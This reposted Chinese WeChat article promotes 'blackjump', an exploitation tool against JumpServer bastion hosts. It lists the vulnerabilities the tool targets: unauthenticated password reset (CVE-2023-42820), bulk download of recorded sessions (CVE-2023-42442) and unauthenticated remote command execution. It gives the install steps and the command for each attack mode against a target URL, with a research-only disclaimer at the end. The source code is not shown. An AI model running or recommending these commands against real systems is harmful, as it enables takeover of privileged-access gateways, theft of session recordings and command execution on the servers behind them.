由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
工具简介
JumpServer 堡垒机未授权综合漏洞利用,Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021
未授权任意用户密码重置 (CVE-2023-42820)
未授权一键下载所有操作录像 (CVE-2023-42442)
未授权任意命令执行漏洞 (RCE 2021)
安装使用
python3
-m
pip
install
-r
requirements
.txt
CVE-2023-42820: 如果知道目标的用户名和邮箱可以指定 --user 和 --email 参数
python3 blckjump.py reset https:
//vulerability
CVE-2023-42442: output/
目录下的 <uuid4>.tar
文件扔进 jumpserver播放器播放即可
https://github.com/jumpserver/VideoPlayer/releases
python3 blackjump.py
dump
https:
//vulerability
RCE
python3 blackjump.py rce http(s)
://vulerability
python3 blackjump.py {
reset
,
dump
,rce} -h
下载地址
原文始发于微信公众号(渗透安全团队):工具 | JumpServer堡垒机综合漏洞利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论